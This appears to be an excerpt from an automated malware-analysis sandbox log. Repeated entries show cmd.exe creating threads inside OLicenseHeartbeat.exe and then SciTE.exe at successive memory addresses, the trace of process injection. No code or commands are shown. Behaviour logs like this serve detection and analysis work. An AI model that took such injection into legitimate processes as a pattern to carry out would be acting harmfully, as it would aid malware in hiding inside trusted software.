Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5040000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5080000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 50C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5100000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5140000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5180000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 51C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5200000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5240000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5280000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 52C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5300000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5340000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5380000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 53C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5400000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5440000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5480000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 54C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5500000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5540000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5580000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 55C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5600000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5640000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5680000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 56C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5700000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5740000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5780000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 57C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5800000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5840000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5880000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 58C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5900000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5940000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5980000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 59C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5C70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6030000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6070000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6130000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6170000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6230000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6270000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6330000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6370000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6430000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6470000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6530000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6570000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6630000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6660000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 67E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6820000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6860000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6920000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6960000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7020000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7060000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7120000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7160000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7220000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7260000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7320000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7360000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7420000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7460000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7520000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7560000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7620000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7660000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7720000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7760000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7810000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7990000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 79C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7BC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7CC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 8020000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 1F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 7F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: CA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2490000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 24D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2510000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2550000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25B0000
